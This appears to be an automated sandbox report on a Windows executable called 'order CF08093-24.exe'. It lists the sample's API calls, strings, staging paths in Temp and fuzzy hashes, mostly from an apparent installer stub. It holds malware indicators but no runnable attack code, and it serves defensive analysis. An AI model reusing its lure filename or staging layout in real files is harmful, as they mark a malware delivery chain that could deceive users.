                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes, xrefs: 0040228E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes
                                                                            • API String ID: 542301482-2464104712
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                                            • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                                            • DeleteObject.GDI32(00000000), ref: 00405027
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                                              • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                                            • ShowWindow.USER32(?,00000005), ref: 00405189
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00405357
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405367
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                                                            • ShowWindow.USER32(?,00000000), ref: 00405511
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                                            • ShowWindow.USER32(00000000), ref: 00405523
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 2564846305-813528018
                                                                            • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                            • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                                                            • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                            • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                                                            • GetSysColor.USER32(?), ref: 0040475F
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                                            • lstrlenW.KERNEL32(?), ref: 00404780
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                                            • SendMessageW.USER32(00000000), ref: 00404802
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                                            • SetCursor.USER32(00000000), ref: 00404881
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                                            • SetCursor.USER32(00000000), ref: 0040489D
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: : Completed$N
                                                                            • API String ID: 3103080414-2140067464
                                                                            • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                            • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                                            • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                            • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                            • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                            • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                            • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                                            • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                                              • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                              • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                            • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                                            • wsprintfA.USER32 ref: 00406206
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                                              • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                              • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
                                                                            • API String ID: 2171350718-461813615
                                                                            • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                            • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                                            • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                            • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\order CF08093-24.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\order CF08093-24.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                            • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\order CF08093-24.exe", xrefs: 00406833
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004067F0
                                                                            • *?|<>/":, xrefs: 00406841
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\order CF08093-24.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-2118705056
                                                                            • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                            • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                                            • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                            • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                                            • GetSysColor.USER32(00000000), ref: 00404582
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                                            • SetBkMode.GDI32(?,?), ref: 0040459A
                                                                            • GetSysColor.USER32(?), ref: 004045AD
                                                                            • SetBkColor.GDI32(?,?), ref: 004045BD
                                                                            • DeleteObject.GDI32(?), ref: 004045D7
                                                                            • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                            • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                            • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
  • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
• Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
• Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
• Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
• GetMessagePos.USER32 ref: 00404E9E
• ScreenToClient.USER32(?,?), ref: 00404EB8
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
• Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
• Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
• Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
APIs
• GetDC.USER32(?), ref: 00401E76
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
• MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
• ReleaseDC.USER32(?,00000000), ref: 00401EA9
• CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Calibri
• API String ID: 3808545654-1409258342
• Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
• Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
• Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
• Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
• MulDiv.KERNEL32(000C216B,00000064,000C216F), ref: 00403001
• wsprintfW.USER32 ref: 00403011
• SetWindowTextW.USER32(?,?), ref: 00403021
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
Strings
• verifying installer: %d%%, xrefs: 0040300B
Memory Dump Source
• Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
